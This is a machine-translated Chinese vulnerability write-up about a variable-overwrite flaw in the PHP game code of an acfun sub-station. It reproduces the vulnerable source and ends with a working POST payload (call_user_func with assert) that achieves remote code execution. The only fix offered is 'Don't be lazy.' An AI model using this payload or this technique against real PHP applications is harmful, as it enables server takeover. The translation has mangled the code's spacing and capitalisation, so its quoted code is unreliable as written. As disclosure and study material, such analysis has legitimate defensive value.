Analysis and utilization of acfun sub-station GETSHELL variable Overwrite Vulnerability again

Where can I leave without wet shoes? Extract + global is a problem sooner or later ..

Go to the topic:

\ Include \ common. inc. php-Line12

Require GAME_ROOT. '. /include/global. func. php '; error_reporting (E_ALL); set_error_handler ('giameerrorhandler'); $ magic_quotes_gpc = get_magic_quotes_gpc (); extract (gstrfilter ($ _ COOKIE )); extract (gstrfilter ($ _ POST); $ _ GET = gstrfilter ($ _ GET); $ _ REQUEST = gstrfilter ($ _ REQUEST ); $ _ FILES = gstrfilter ($ _ FILES); // ha? Require GAME_ROOT. './config. inc. php ';

Introduce config later to avoid overwriting important variables.

 

Gstrfilter Filtering:

\ Include \ global. inc. php-Line48

 

Function gstrfilter ($ str) {if (is_array ($ str) {foreach ($ str as $ key => $ val) {$ str [$ key] = gstrfilter ($ val) ;}} else {if ($ GLOBALS ['Magic _ quotes_gpc ']) {$ str = stripslashes ($ str) ;}$ str = str_replace ("'", "", $ str ); // shield single quotes '$ str = str_replace ("\", "", $ str); // shield the backslash/$ str = htmlspecialchars ($ str, ENT_COMPAT ); // escape special html characters, that is, "<>&} return $ str ;}

Important variables rely on 'Current access' and filtering to avoid the problem caused by lazy join sqlquery to a certain extent... at least in most code ..

 

 

The key here is:

\ Command. php-Line3

 

Require '. /include/common. inc. php '; // $ t_s = getmicrotime (); // require_once GAME_ROOT. '. /include/JSON. php '; require GAME_ROOT. '. /include/game. func. php '; require config ('combatcfg', $ gamecfg); \ command. php-Line92if ($ mode! = 'Combat' & $ mode! = 'Corpse' & strpos ($ action, 'pacorpse') === false & $ mode! = 'Senditem') {$ action = '';} if ($ command = 'menu ') {$ mode = 'command'; $ action = '';} elseif ($ mode = 'command') {if ($ command = 'move ') {include_once GAME_ROOT. '. /include/game/search. func. php '; move ($ moveto); if ($ coldtimeon) {$ export cdtime = $ movecoldtime ;}} elseif ($ command = 'search') {export de_once GAME_ROOT. '. /include/game/search. func. php'; search (); if ($ coldtimeon) {$ export cdtime = $ searchcoldti Me ;}} elseif (strpos ($ command, 'itm') ===0) {include_once GAME_ROOT. '. /include/game/item. func. php '; $ item = substr ($ command, 3); itemuse ($ item); if ($ coldtimeon) {$ export cdtime = $ itemusecoldtime ;}} elseif (strpos ($ command, 'Rest') == 0) {if ($ command = 'rest3 '&&! In_array ($ pls, $ hospitals) {$ log. = '<span class = "yellow"> your location is not a hospital and you cannot stay up! </Span> <br> ';} else {$ state = substr ($ command, 4, 1); $ mode = 'Rest ';}} elseif ($ command = 'itemmain') {$ mode = $ itemcmd;} elseif ($ command = 'song') {$ sname = trim ($ art, '['), ']'); include_once GAME_ROOT. '. /include/game/song. inc. php '; // $ log. = $ sname; sing ($ sname);} elseif ($ command = 'sync') {include_once GAME_ROOT. '. /include/game/special. func. php '; syncro ($ sp_cmd); $ mode = 'command';} elseif ($ command = 'special') {if ($ sp_cmd = 'SP _ word ') {include_once GAME_ROOT. '. /include/game/special. func. php '; getword (); $ mode = $ sp_cmd;} elseif ($ sp_cmd = 'SP _ adtsk') {include_once GAME_ROOT. '. /include/game/special. func. php '; adtsk (); $ mode = 'command';} elseif ($ sp_cmd = 'SP _ pbomb') {$ mode = 'SP _ pbomb ';} elseif ($ sp_cmd = 'SP _ weapon') {include_once GAME_ROOT. '. /include/game/special. func. php'; weaponswap (); $ mode = 'command'; if ($ coldtimeon) {$ export cdtime = $ weaponswapcoldtime;} elseif ($ sp_cmd = 'oneonone ') {$ mode = 'oneonone';} elseif ($ sp_cmd = 'SP _ skpts ') {include_once GAME_ROOT. '. /include/game/clubskills. func. php'; calcskills ($ skarr); $ p12 [1] = 1; $ p12 [2] = 2; $ mode = 'SP _ skpts ';} else {$ mode = $ sp_cmd;} elseif ($ command = 'team') {include_once GAME_ROOT. '. /include/game/team. func. php '; if ($ teamcmd = 'teamquit') {teamquit () ;}else {teamcheck () ;}// omit Part Of The content .. directly go to the final logic} elseif ($ mode = 'senditem') {include_once GAME_ROOT. '. /include/game/battle. func. php '; senditem ();} elseif ($ mode = 'combat') {include_once GAME_ROOT. '. /include/game/combat. func. php'; combat (1, $ command);} elseif ($ mode = 'Rest') {include_once GAME_ROOT. '. /include/state. func. php '; rest ($ command); //} elseif ($ mode = 'chgpassword') {// include_once GAME_ROOT. '. /include/game/special. func. php '; // chgpassword ($ oldpswd, $ newpswd, $ newpswd2); //} elseif ($ mode = 'chgword') {// include_once GAME_ROOT. '. /include/game/special. func. php '; // chgword ($ newmotto, $ newlastword, $ newkillmsg);} elseif ($ mode = 'corse') {include_once GAME_ROOT. '. /include/game/itemmain. func. php'; getcorpse ($ command);} elseif ($ mode = 'team') {include_once GAME_ROOT. '. /include/game/team. func. php '; $ command ($ nteamID, $ nteamPass); // <----------}

Team. func. there are two methods in php: establish the team function teammake ($ tID, $ tPass) and join the team function teamjoin ($ tID, $ tPass), depending on the command selection from $ command, but it seems that when a programmer is lazy, he forgets to unpack the extract package?

 

 

Construct a request:

$ _ POST ['Mode'] = 'team ',

$ _ POST ['command'] = 'call _ user_func ',

$ _ POST ['nteamid'] = 'assert ',

$ _ POST ['nteampass'] = 'phpinfo ()'.


 

Solution:


Don't be lazy ..